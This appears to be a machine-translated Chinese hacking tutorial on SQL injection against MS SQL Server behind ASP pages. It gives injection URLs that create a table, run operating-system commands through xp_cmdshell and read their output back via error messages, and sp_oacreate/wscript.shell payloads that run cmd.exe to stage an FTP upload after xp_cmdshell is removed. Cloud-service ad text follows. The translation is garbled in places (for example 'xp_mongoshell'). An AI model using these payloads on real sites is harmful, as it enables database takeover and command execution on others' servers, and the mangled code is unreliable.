Author: Alpha from: http://www.cnwill.com/
1. display the echo executed by cmd.
When the injection is a sa permission, it is very painful to not see the command display. There is also an attempt to display back in the nbsi of Brother Zhu. Why? Haha
I will introduce a method as follows. It is absolutely right to see the echo. I don't know what method John is using.
Create a table
Statement: http://www.xxxxx.com/down/list.asp? Id = 1; create table dirs (paths varchar (1000 ));--
Return: normal information! The table is successfully created! Continue!
Statement: http://www.xxxxx.com/down/list.asp? Id = 1; insert dirs exec master. dbo. xp_mongoshell net user ;--
Return: normal information. The data written to dirs is normal.
Statement: http://www.xxxxx.com/down/list.asp? Id = 1 and 0 <> (select top 1 paths from dirs );--
Return: Microsoft ole db Provider for SQL Server Error 80040e07
A syntax error occurs when you convert a varchar value *** to a column whose data type is int.
^ _ ^, So we can see the echo result. Of course, the content in the nbsi brute-force table will be faster.
Similarly, other extensions can also use this method to obtain content, such as regread (not tested)
2. xp_dirtree write Path Problems
The nbsi directory list tool is not very useful. Sometimes the columns cannot be displayed, but it is actually out. You can directly view the table data (default: NB_TreeList_Tmp.
3. Vulnerability Detection
The Vulnerability Detection Function of nbsi is not flattering. It is recommended that you manually check the type of quotation marks when writing numeric characters, this ensures that everything is safe (: P)
4. Delete xpsql70.dll and xp_cmdshell, and solve the upload failure problem.
Actually, czy has already said it a long time ago. I remember lzy said it too, but it seems different from this.
Declare @ s int
Exec sp_oacreate "wscript. shell", @ s out
-- Exec sp_oamethod @ s, "run", NULL, "cmd.exe/c echo open asp.7i24.com> c: a.txt"
This is executed in the query analyzer and can be executed directly in the address bar, as shown in the following figure:
Declare @ s int; exec sp_oacreate "wscript. shell", @ s out; exec sp_oamethod @ s, "run", NULL, "cmd.exe/c echo aaa> c: a.txt"
Not tested at the injection point
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
